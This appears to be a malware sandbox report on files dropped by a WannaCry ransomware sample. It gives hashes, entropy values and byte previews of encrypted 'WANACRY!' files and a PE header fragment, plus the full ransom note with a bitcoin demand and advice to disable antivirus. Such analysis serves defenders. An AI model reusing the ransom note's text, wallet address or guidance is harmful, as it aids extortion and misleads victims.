                                                                                      Preview:WANACRY!.....i.g*.{.......j..3..,.%.[.W-.$Cr[$5...z*.....b.6':....0R....W,f*....S.\...kf........S.x/%...L..v@\..U.d....2.d..y...>.U.h..'@....e!.{.B.6Ps0'.L..6u.s....AT|..3HhdP.%.A.YdE.PE.$i....2..........!f7.h.....MC\..F..YcJ-..S.....{..bNL.%....>..19............J.z....n....a........._......._.IRi........Y.Zd....n6..lh$...^..X!]j..l8B...T~sx..#...Iv...M..BAt.9s.lB..p..g......<R.M..+%......S#..`^R...H...%.;..R..<...[.q4D.~....t...=h.C.d....q.*....q~S.D.....D...ks..p...T...&.9g...U.z..4'7Q.r..?..w......r...-..L.,cK.&p......g..3.(-...0......2.>.>KW..X...f.*.....ZL.\@d.gW...K.M...K..tI.`..L.....V...Y$.]D3.3#g.i...;-.%.A...~. ....iN..:.6..N..;%G.\L..f1..m'.V.T(F...O\/V......k6.....p..xN.Xr....[..P..o..0.i...a....z..G..tp.5k...........%..Z.j...2...V..>!...j..HP...+p-.Vab.:4.<M!.y;<o...0c.!~.I._1ZE$......!F..<.7..#....E.....6z.i.#.Y.-7....../.......M..B......8,.1..k.%... -...-7`...C.->.G.1.35P5.....?DU..O.Ru.._...Q..9~.E.{.S.S#.F.P
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8360167821667
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HDs8nx79u/W7fTKZW2ltTozIsUqDtFndxC16n9EWS3j:jsObHbTRytkksbvdxr9mj
                                                                                      MD5:5B489BCBB89AB4C1EDCCD450D6F5F77D
                                                                                      SHA1:FEFED5AFADAE5FAE9671F18EE129765AA49FAAF3
                                                                                      SHA-256:52D6E6184D8CF19AE46A101801DB6093DEBDB98819D6E3B8C94BBD6100C21743
                                                                                      SHA-512:B9E5009DDF65B49DCBFBAAE12DB1BB33D17CAB49A860B63D2D3BF47726F8C8296CE1BC7FCE08F0DA0F8C9A27516CEA787656B930488C0C036DFA3677C4AF176D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..]..F7.5...}cj.0..,"........H.....<.'.{.u|...T.}....p~y.....+E....9...e......bvr.v.f.{{..~0Xo..[......>...Rh...t....|v.=..].....'.......m.Q.t.......'.m.....u.. .()..~.\.O.T..&...'..W..s......El..{...xT...N.3.r..d.A.........E&<......(.1Uz........KS...F.W..G.01.g..oP.R3J....rK:U..m.B:..u.=.,.../I~......O...l.l...+._....a...35 +......a.#R......aD+2.`.5...r.?.S..w5..W=.A._D...X...t.@~..za...?....<...V.K.-.X.....>.>.6....(.X..d.....l.."{..af.....M...D.b.n_.kI-........c..-..t..?..K._e<.u.M...{.s..[..,m..&.......O..Y.K.SE..H..j..tWp#.C.b...><g......NA...bX..%..)..z.=.D..q....j}.b.KTC._}I..4.8.^.v4@b...=d=..A.|Q.V..*...#.A.s5......kQ5....j.g>);..f.;...z...].....s..!:...$I...,.qB..P6.Q)..../.R./rzD...V..~...7.'..@.-...?......q.6.b.......P.E2.....(&[.w..........L...2"N....jM._$;L=.B.\<_[(j..........k.*fB.$a.r............Dp....wU.G.Ht.dH..tY.`..&...d.) ..+..n..A.i.\.l...a.W.6...c2...;e~,1.P.....y.....}...=.......i.NN.;Q..u.\Z...u...@.^.`e 9.sF.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.842085672245693
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkk8u05R0mav85V9TmTI0hgOZE8xjbL7/gOY0fbFcCB8HMvrVp:bkk8u0T0mav85V9Tb0nEmBtB8szX
                                                                                      MD5:4D0196A2358BE8ECF78A7B283090135F
                                                                                      SHA1:A35D42745B34FE2CDA568D5B316BDF9361DF48BC
                                                                                      SHA-256:0696B782BBB48DEDF6848FEF389C988782318E4C10EF17F9F3D849903427F125
                                                                                      SHA-512:BFBAEEDFF3B922D2570F5B04CD3B6DDD2E475994CB91DC78359BA97D33BA0703E201F1E9292AC91B17A2000E1C273F4F5F64C183943EC28F5A79E25E6852D17D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....F..,......R....z......M..q(.%.8......qofU..+Cz.S.Mf..P$T....3...M.....l$...0...P.....g....I....l.>.L..........4.dm!.;z~!..*K..Ne+.q......8..~........v|....f?r....c.m.H..o.{..9).j..wJ.....|..f?&._.U.<..L.Q=...6C.".....>Q.m.%.`|..`:......D..:............u&...F.P.hTS.'lM..a...2V....,....)K[...G?...#*<R.5......l.P..KM....`? ....} 4._.. ..=.2.u..p..K.8...^.O.,....!.WW.....1*`5..l..m....h.6/....x.....1#ilg7...[.d7e3..^..|`^Q.!.d..W..#.s....!.Is....4{..(!`u......K..iUgd%..,.f@....nG.......)T.....K..!.....C}....N..A..h.h.SdDV...'...!E8......-....1.8..o=..h.h..s..D..E...E&.....:.C.<..W.e.c.U'..v..& 3......Z.....{fg....69..?j."..d.Z..Y..?..X%f...r..@...\....).....2...4.....qa.#[.#4i.<|'.... M.:C...=...@..mb!..n/:kS.wU....@.Y...`.0y1..../4.$...'n.a..Nb.'3...........Ym.....>........>..@~......]....L8.....O.5nZ...d.\o...=.n.<.9...;........M-.q+...^G.....0303..H..=?>..e`7..0_...s..aO.?/A.....q..E4l...Q.#|.i...E.....?&x......j.E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.842085672245693
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkk8u05R0mav85V9TmTI0hgOZE8xjbL7/gOY0fbFcCB8HMvrVp:bkk8u0T0mav85V9Tb0nEmBtB8szX
                                                                                      MD5:4D0196A2358BE8ECF78A7B283090135F
                                                                                      SHA1:A35D42745B34FE2CDA568D5B316BDF9361DF48BC
                                                                                      SHA-256:0696B782BBB48DEDF6848FEF389C988782318E4C10EF17F9F3D849903427F125
                                                                                      SHA-512:BFBAEEDFF3B922D2570F5B04CD3B6DDD2E475994CB91DC78359BA97D33BA0703E201F1E9292AC91B17A2000E1C273F4F5F64C183943EC28F5A79E25E6852D17D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....F..,......R....z......M..q(.%.8......qofU..+Cz.S.Mf..P$T....3...M.....l$...0...P.....g....I....l.>.L..........4.dm!.;z~!..*K..Ne+.q......8..~........v|....f?r....c.m.H..o.{..9).j..wJ.....|..f?&._.U.<..L.Q=...6C.".....>Q.m.%.`|..`:......D..:............u&...F.P.hTS.'lM..a...2V....,....)K[...G?...#*<R.5......l.P..KM....`? ....} 4._.. ..=.2.u..p..K.8...^.O.,....!.WW.....1*`5..l..m....h.6/....x.....1#ilg7...[.d7e3..^..|`^Q.!.d..W..#.s....!.Is....4{..(!`u......K..iUgd%..,.f@....nG.......)T.....K..!.....C}....N..A..h.h.SdDV...'...!E8......-....1.8..o=..h.h..s..D..E...E&.....:.C.<..W.e.c.U'..v..& 3......Z.....{fg....69..?j."..d.Z..Y..?..X%f...r..@...\....).....2...4.....qa.#[.#4i.<|'.... M.:C...=...@..mb!..n/:kS.wU....@.Y...`.0y1..../4.$...'n.a..Nb.'3...........Ym.....>........>..@~......]....L8.....O.5nZ...d.\o...=.n.<.9...;........M-.q+...^G.....0303..H..=?>..e`7..0_...s..aO.?/A.....q..E4l...Q.#|.i...E.....?&x......j.E
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.823403003824815
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/nqUGXPf88wf0Q0imIH4khbZmUOajpYD6zlX:/nW3887Q0gYAs69E6zlX
                                                                                      MD5:F309203A98C6D31AB4BA6DC035248457
                                                                                      SHA1:B337FA223981E51275A302B8BA97C3F17C8D8583
                                                                                      SHA-256:9ECB69DD6C34AEA6927DACD14369F90CB9327D2838870AA7ECDADC98280E6D63
                                                                                      SHA-512:48DE82F5A5A4249CF85A2F2AC74A70A888BC8399DCB477DE7E6D79CF8C1B2EA80ECE398D693E8E57A68E9A7263CBDAC60D1F6D356E8F427E25396D58C1274C5C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.....G78..n.......d.6..*...K..[.r!t........}.y..........;e..`.GJm..AA>z..y.$a.p...x4.m..%...v...3.."O.=.~"...:_n.....Qb*..).H..%.....a...IX#S.....)V....YT..)....{..A.*.......3.b,.<{......^.&..,q.ke.MO.....s.....g....}.....n..J....T....a^(..w.R.<j........1....<..&......a.}....u....V.N...Z'...Vh..&....Ysy.#. .|f...6...4G...q.K.....Y....c..a..........0...%.....]..8.0...E.<...;U..;..<...MRnQ....)6...C'....@?.Y.n$|..'.../.?s...>$..~B&..ScE...YH..e.[.bw&.dP_%...9..=a............i....p.4....Qw".qb.s.....:Wt.}..c.m...q'...t'j...(..I.}. ...e.J....h....\p...c...1..7..tX#.Wu.*.%+.z......&.....!...j=.0.......x..u.../Jh;..!13.k.4<@..Fo..()......B.X..U.2...]`.&4..0.k..H..6Us.......@..t<../......y........>).g\.V9C....iM...Ejq...:.O.pBr...0._......@.k..H........m....N{..JUA....._.w#./.?...d].|......^..)/:...Q..g.\......^.0W.VC.H..wy.uX...4...>.>B+..).V.'!.A...a*..1..A..I..Y.. w...Z.;.a..l....[.0z$...N.F...\.|".~. t..T.2 ....w...l....\..'..%.S..HT...P?.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.842433783813462
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkViUQGmT3t1hU0Nj+q34kMl+5o8oQnHq6DA9Ao2HKcao8j5/h1zZ/9/:bkn+T91LNCq34km+oQHS9Ao2HKcao8D1
                                                                                      MD5:D08134A5D21878378020AEEA20AC8DF7
                                                                                      SHA1:8F9BEA713D7EBB443C4DCC28039BFE2C4730D9A2
                                                                                      SHA-256:DF63ADD54F9EEF59A3756B8FBE0A323791A7B8F04EE0793B3115CE68A1C2135D
                                                                                      SHA-512:FCCC4052438438FAA5C1E605D510463B67C9B6634A6B24FAB4A8AD3E97DE377276A88556E60BDD7F2813B0DBB07627D3A21F10EDFF4F85D74DB67C87AC62C926
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w......ns...I7@TP.x...e.;.3.~/....^%..P..d..p..+..u5..e..z...@.T[&l"w>..;.@2....-.Wi.XU.*.b..].......6.h6...wG.K.:.;[w..t.vC.!....,.m...R.H.!.=...v...].^.....K.C..f.J..X'g."(m........^.GS...-....A0|../L._.......n...C......v..2.Q..A5.Ma.2.f..............n..Eh.....{.P...:OPe.1.Ne...zkU;..<.e...X3.C...Ni3D4'...y.,.`B..k........C......^D.z..........^.........e$.^....e.hd^.xhNcH.'.+...6C.X....on.k...l.r..C'.....5.....+.9....V..|.U.T....r.,o.X...G.....@5.sE2.tX.\h...Pf.8.B.a..f..4wq...`..)@.8.c.....~i.)nX..K!..7.X.d?.dC.b(I..:@0(..+.6..$ .H.q..".......7..rq\:RW'.&.d.c.$O .!j..Y...(2.2..~...Pw.g<[(.L......K8<.F..D....Qt.......,...[F.3..F..l....m.1v.p..D.s.. ..4.J...........?........0..n+.......b..D..<..;K....n1.'......]A....t.`T ..#.Q_......M.y.Y....+.0.E.....U.....i..V.......b.....<..g.c..Br.i....w...5.NNXM.Ya.o"..K..s...;...{........v!p..sS.....6.n.(3.v.......j.Im.i3.......s.}.Xt~'(`..k._._....~.h..*..../Sy......B.. .*c...w.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.842433783813462
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkViUQGmT3t1hU0Nj+q34kMl+5o8oQnHq6DA9Ao2HKcao8j5/h1zZ/9/:bkn+T91LNCq34km+oQHS9Ao2HKcao8D1
                                                                                      MD5:D08134A5D21878378020AEEA20AC8DF7
                                                                                      SHA1:8F9BEA713D7EBB443C4DCC28039BFE2C4730D9A2
                                                                                      SHA-256:DF63ADD54F9EEF59A3756B8FBE0A323791A7B8F04EE0793B3115CE68A1C2135D
                                                                                      SHA-512:FCCC4052438438FAA5C1E605D510463B67C9B6634A6B24FAB4A8AD3E97DE377276A88556E60BDD7F2813B0DBB07627D3A21F10EDFF4F85D74DB67C87AC62C926
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....w......ns...I7@TP.x...e.;.3.~/....^%..P..d..p..+..u5..e..z...@.T[&l"w>..;.@2....-.Wi.XU.*.b..].......6.h6...wG.K.:.;[w..t.vC.!....,.m...R.H.!.=...v...].^.....K.C..f.J..X'g."(m........^.GS...-....A0|../L._.......n...C......v..2.Q..A5.Ma.2.f..............n..Eh.....{.P...:OPe.1.Ne...zkU;..<.e...X3.C...Ni3D4'...y.,.`B..k........C......^D.z..........^.........e$.^....e.hd^.xhNcH.'.+...6C.X....on.k...l.r..C'.....5.....+.9....V..|.U.T....r.,o.X...G.....@5.sE2.tX.\h...Pf.8.B.a..f..4wq...`..)@.8.c.....~i.)nX..K!..7.X.d?.dC.b(I..:@0(..+.6..$ .H.q..".......7..rq\:RW'.&.d.c.$O .!j..Y...(2.2..~...Pw.g<[(.L......K8<.F..D....Qt.......,...[F.3..F..l....m.1v.p..D.s.. ..4.J...........?........0..n+.......b..D..<..;K....n1.'......]A....t.`T ..#.Q_......M.y.Y....+.0.E.....U.....i..V.......b.....<..g.c..Br.i....w...5.NNXM.Ya.o"..K..s...;...{........v!p..sS.....6.n.(3.v.......j.Im.i3.......s.}.Xt~'(`..k._._....~.h..*..../Sy......B.. .*c...w.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.791231106897536
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8mINA6S4iVC95q4WZPB4dThT30qQSPQNr94H4Wgr9R:DINaRg9JlPQpS1y
                                                                                      MD5:A0BE15FCCFF12765EC63C732BC3DC2BB
                                                                                      SHA1:240B9227869357FDA364A0D8CA1DEAE4B555797E
                                                                                      SHA-256:92E027CAFD40301B7240E5A49F81E7116D4860CB5F15C83167B9568BE50410F1
                                                                                      SHA-512:F90A5D8A0B031CD248474345BCB68AFAD35C361E30960C13A8FBAF69BE8762EEE0F5175A3DA3ED7F7C701C5C5FA535C2D6A8227983F205077AFFB1C3BB83B4C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:B....*\%.3....oK...,j.h..'..!....vz..X..A..v4!.B...az0.O....k;]....".....QL.....Y....'./R.V.).).......S.....1...k..}........L|..T.'.5sW....3......}0..T..........%.^..6.....,8;..wk..N.....H..;e..4.L.5..a}.&@q.$...-...lP&..a....;..O<.j5;.......j...;..X.%...u`...#....2&.)....q4...y.d..P.)...x..&i{Ao..7.(..U.XP;.V.6...M..!5..&B.D..kB...x.'..)`.];...6...i..........f...nD'......}.<VZ....{5.Bei0....Z@H.{1m.f../R..mC.j...........z.q..;f.)..........K.D.7.;KT.....3.Hp...i.NPPgR u.....\$[...Y..O.0.<..oJ/.g.@..=Z..<._....{`.k..#E......].yb...&....y.....n...c.. ...-..W.]."....Zs._9.. ._.|q..Q./.bkr.@.L!?.|$.f..@/.!.`@a's$@3B.....2..tX.[4Rw.r..?.{.yMgt.x.d>\...G6.......m.S..W&.....y.rL>YE..\......>,..Q!.....U6..z..$..t./6.....<..H.K..[...C.u.e.......JQ.....!.O.b."Btu....:...{.P...JG*.RE......%#`......~....0.R.#.)..#.#.vr..HY}..$B... .....=9GAK..I+#...W5wf5T.G......-;(....w....l....|.....KA..<.|h.B<,O.+s......wO..(x..U.~VEy..M...c...A%m..V..;..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.837638180115022
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkwk+WSFs2nOTQ9B2gVy9IVFs9vOa44GBBuKWZwW9FnW4aPDBu0rWBRYjfvhUPb:bkw7Wcs2nOegl6VFshxAuKWZwW9M4aPk
                                                                                      MD5:C2AAE82EAD06184BC816392F268A3A27
                                                                                      SHA1:7ACD88A8EDEDE0808F6417A16DD146D6C8DFEF59
                                                                                      SHA-256:BD76F8A722B8DA9667F6D787D39A7736F52371CAB79E9698598673F06FE39CDA
                                                                                      SHA-512:C26B1C762B8E5E3648CC5E3729105492B7A6C3674DE379A2B25E8D1A3EF9F2D1028F8B615FBFF72FA60052B676594337FD3B6DC57B16420590AD1FBAC0CDB033
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....i.M...T.6X>y|.=.c...=A.I......0....A..1.A...f4..f.^...=g7...e8m_9m......t6..}..iX...~.oj{..Q@-H(....P5N...N...,..!.i...\....9....lC\..0........2...nX.....P.wM%...W..E]..yZA.-.c.V..9N..../.T.|B.Q..<zCwEt.?-./...$..3w;{.D&..&.i..ud..;.?J{N.8....\ors4.].............B.f..{........`X5p..f.0...;............{/.\.;.;.'.....c1.T.....GQ...r.p.P...I.).KA......q..U..*......!Xg2UD..8.l.y..1....W..S#w.]....}.1....A.....;..*.l...7..'......P.......%c..3.7..L.y.P....@........[@...C.[[.bZ.i.._....,.Rm.>`.d......dJ;.,....Y.....V..4...Q._..T....Q......o....J..9.r._...e5Df+L.....#...w...)Z.z5w........T.>{....-sc.4..f........m..~..m'......V1.2]..6............ c.,.m)@|..d3.3)D~.>b...V...g0.8.. .$.M.....X...,....!K.%..o+T...C.d.dh....U..Z.......ObXB.k....I%.G..x%...,n....[..o.k..^JC...../.%c....$.. ..f#.;;..Q..7&.vc...#...9..F......r.O.I.y+Jew....E...D`..1R..K^##zj0._.(^F...{.ss/.V..L..xc....D..##.x.'...$D....-.D.?.a.../...uG.z.$U.7z5Z...~...*.G.pZ.W...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.837638180115022
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkwk+WSFs2nOTQ9B2gVy9IVFs9vOa44GBBuKWZwW9FnW4aPDBu0rWBRYjfvhUPb:bkw7Wcs2nOegl6VFshxAuKWZwW9M4aPk
                                                                                      MD5:C2AAE82EAD06184BC816392F268A3A27
                                                                                      SHA1:7ACD88A8EDEDE0808F6417A16DD146D6C8DFEF59
                                                                                      SHA-256:BD76F8A722B8DA9667F6D787D39A7736F52371CAB79E9698598673F06FE39CDA
                                                                                      SHA-512:C26B1C762B8E5E3648CC5E3729105492B7A6C3674DE379A2B25E8D1A3EF9F2D1028F8B615FBFF72FA60052B676594337FD3B6DC57B16420590AD1FBAC0CDB033
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....i.M...T.6X>y|.=.c...=A.I......0....A..1.A...f4..f.^...=g7...e8m_9m......t6..}..iX...~.oj{..Q@-H(....P5N...N...,..!.i...\....9....lC\..0........2...nX.....P.wM%...W..E]..yZA.-.c.V..9N..../.T.|B.Q..<zCwEt.?-./...$..3w;{.D&..&.i..ud..;.?J{N.8....\ors4.].............B.f..{........`X5p..f.0...;............{/.\.;.;.'.....c1.T.....GQ...r.p.P...I.).KA......q..U..*......!Xg2UD..8.l.y..1....W..S#w.]....}.1....A.....;..*.l...7..'......P.......%c..3.7..L.y.P....@........[@...C.[[.bZ.i.._....,.Rm.>`.d......dJ;.,....Y.....V..4...Q._..T....Q......o....J..9.r._...e5Df+L.....#...w...)Z.z5w........T.>{....-sc.4..f........m..~..m'......V1.2]..6............ c.,.m)@|..d3.3)D~.>b...V...g0.8.. .$.M.....X...,....!K.%..o+T...C.d.dh....U..Z.......ObXB.k....I%.G..x%...,n....[..o.k..^JC...../.%c....$.. ..f#.;;..Q..7&.vc...#...9..F......r.O.I.y+Jew....E...D`..1R..K^##zj0._.(^F...{.ss/.V..L..xc....D..##.x.'...$D....-.D.?.a.../...uG.z.$U.7z5Z...~...*.G.pZ.W...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):245760
                                                                                      Entropy (8bit):6.278920408390635
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                                      MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                                      SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                                      SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                                      SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.833755953827884
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:yODft0P99sPvXwhifac0em+J4w0RgJagxCj+pMDUBu:yEE9GPvXUw5CwXrUCpu
                                                                                      MD5:EC90D30C23103F180FAAB70A45077765
                                                                                      SHA1:1BEE6F715B4697440749EBD6BDE5FC358DB5CF65
                                                                                      SHA-256:2DEFFD7B17CA589EBF7000A1372721409751B434C6483687B019D9FA1B9888E1
                                                                                      SHA-512:6877FAFFB8C2BF8E4D1711B53925235362734327750A7255E9A1DEE887B76CA30E4B355946EC1E690B25FF220F37C7AF566417B9743009AD1178EEA24000CFF4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:....W....:.......W'.9..=S..d.'..b1....W...jmM..4,......L.S....,.]...;5...].Xz*.7v.Nr.{N..GT.=..V0...Dqiq..mQH.?f..=.Rz...m5.*.|.iV.`....M.(.....x.h...8h .X.y.....jC..}..d.r..uKsE...B.....S.F~Q...M'.e.X?..J.=..J..q}.?x.*..lo....8..../S.D.I..G...k._.)...i_.v1..6.....+.k..#......D.f.k^.N..}..E....7#d;...'.:N......4Q.N..y..7}e...5.>.z.!...M....f..9...W...&..kY"?.#.."..l!..!....".k..x.D-..$)...u.)....._z........U.3..sY_.O&..:..[hz.X7...8..k2.\..[..,O.n.r...0T....R...b"+..........,;.[.Gp...Y.r...A....1~..t..........P.....l9......L.p.'.H3.~.E..M1.c.0.~....P.r...5..+z.]..?.....[.............Z.....o.U...1.a\.r.4.<..l..p......GS.h.M.........t...'..F.=..*.k.....}.....i.c.8O!a.Q..q..%...g.b4.P.)....i...*x*t.?C.Z\...L#......%.=...4..>j..rx.7n.yU...aL..^.f|..X@.Zw...%.5..C..Q.z@....wY$.6(`...+M.q^..$x.....?...A_n.oC,....n\....wd..3W.a.52...Q...e_bQ.`d.&.........l.T..Q..ph..W...n.........a.sp........R.jE..r...J..Q#."..<....e.....0C.H2S...h...;.JB..l.04Oz
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.856462202441563
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkIWKF76BttsZ/3BYknKsaEILYIjBnm9QD+SwKXmxYl/gf0C9Ihq+KIP:bkIh6BDsFKUIkozSK2+lof08Ih24
                                                                                      MD5:60DE9735591CBE3ED71CB817652CA359
                                                                                      SHA1:13DFD1466468985E63F124FBEF1063622A733E32
                                                                                      SHA-256:0CEC76AAB8E0B7595562017EC26CDB5CE51CF3292C22811F3AF43DB1A7C46D62
                                                                                      SHA-512:C367C5C076FBE890F1E4ED038DE4D00BEA9C105EEF684FF87494EDEF51E9035709703D8D444D30F8F188B37BF06C531ECC1E0429E626D4D644C4D0A9D3E5409C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......O.H..L1.Gu._..e..Z.%....D.5..>.....Z...e.....?..f;...2.e.^.u.7.._..r...*...p.J.Jz..3.......w.V%!m.....|5..^~q.......oS.*.^F..O..S...j./..\o.w..7...5....].....T+*?..9}..{...u..&..lj.Tz....N.\...m..)..?s.W...h.....=.x.....2x.m.h'...3...A...P2.|................;......<d.....Z.26.k...v..V.^A....z+.V.t{.Yn..o..-...Ub.`.|U.Y.W..........9.'_.S.D....W..c...>1U\.J...).kF.%.&..-....P.O.j....j.c...Q.....mN.o"...\+phH.._Xc.3.r..T.C%.3. {.4D..O....b.w....3..A...g6.=.+.....s/.&4..>....w..A..`S.j.'.h.9..n.VB...~...4.u..Cc.......V.k...<....$...'Fn..v.#....G.E....b.K.!.s.).../.k.'EX ...h.Zu.^[.yJ..~.EY.Q.?..nm...j....i.......b/|.g.......^Q....QH.5.....y..z.<./ts.8..n%....|...&.tH..j...........'.B..`.2.w.......\P..`...-.H_C...Y.d]..`I.......Q.{2.$<. ....8?4]w..^{gD..0_.g..c.l[H.^uQ.>...0...f..E...(.W.Q}.W....T..].....1..Jc...t.....erb4..._. ..XS......w.f~\$........@..F..3.."....vt.).^bq..=m.....B.S......P.-`+.g.l(..%.+.Q.%.....~..r:LK#d\%...^K.r+.!
